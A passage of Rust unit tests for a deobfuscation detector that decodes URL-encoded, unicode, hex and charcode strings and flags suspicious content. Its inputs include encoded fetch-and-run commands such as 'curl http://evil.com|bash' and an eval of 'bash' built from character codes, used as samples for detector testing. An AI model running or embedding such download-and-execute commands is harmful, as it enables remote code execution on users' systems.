933        let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
934        let results = deob.deobfuscate(content);
935        // Should decode the URL-encoded parts mixed with normal chars to suspicious content
936        // If not suspicious enough, the else branch is still exercised during decoding
937        let _ = results; // Test exercises the code path regardless of result
938    }
939
940    #[test]
941    fn test_unicode_escape_mixed_chars() {
942        let deob = Deobfuscator::new();
943        // Unicode escapes mixed with normal text - tests else branch (line 176-177)
944        let content = r"var x = '\u0063url \u0068ttp://evil.com'";
945        let results = deob.deobfuscate(content);
946        // May or may not match depending on pattern, but exercises the code path
947        assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
948    }
949
950    #[test]
951    fn test_decode_hex_invalid_format() {
952        let deob = Deobfuscator::new();
953        // Hex with invalid characters that won't parse as hex
954        let content = "\\x6Gurl \\x7Gttp"; // 'G' is not valid hex
955        let results = deob.deobfuscate(content);
956        // Should handle gracefully
957        assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
958    }
959
960    #[test]
961    fn test_charcode_partial_match() {
962        let deob = Deobfuscator::new();
963        // String.fromCharCode that decodes to suspicious content (bash execution)
964        // 98,97,115,104 = "bash"
965        let content = "eval(String.fromCharCode(98,97,115,104))";
966        let results = deob.deobfuscate(content);
967        // Should decode the charcode to "bash" which is suspicious
968        assert!(results.iter().any(|r| r.encoding == "charcode"));
969    }
970
971    #[test]
972    fn test_deobfuscator_default() {
973        // Explicitly test Default::default() implementation
974        let deob: Deobfuscator = Default::default();
975        assert!(!deob.is_suspicious("normal text"));
976        assert!(deob.is_suspicious("curl http://evil.com"));
977    }
978
979    #[test]
980    fn test_url_decode_mixed_with_plain_chars() {
981        let deob = Deobfuscator::new();
982        // URL encoded with some plain chars - tests the else branch at line 139-141
983        // "curlhttp" where 'c', 'u', 'r', 'l', 'h', 't', 't', 'p' are encoded but spaces are not
984        // Actually the pattern requires consecutive %XX sequences, so let's use a different approach
985        // "%63url%20%68ttp" won't match the pattern, so we use fully encoded suspicious content
986        let content = "%63%75%72%6c%20%68%74%74%70"; // fully encoded "curl http"
987        let results = deob.decode_url(content);
988        assert!(!results.is_empty());
989        assert_eq!(results[0].encoding, "url");
990    }
991
992    #[test]
993    fn test_decode_url_hello_world_not_suspicious() {
994        let deob = Deobfuscator::new();
995        // URL encoded but non-suspicious content
996        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; // "hello world"
997        let results = deob.decode_url(content);
998        // Should not return results since content is not suspicious
999        assert!(results.is_empty());
1000    }
1001}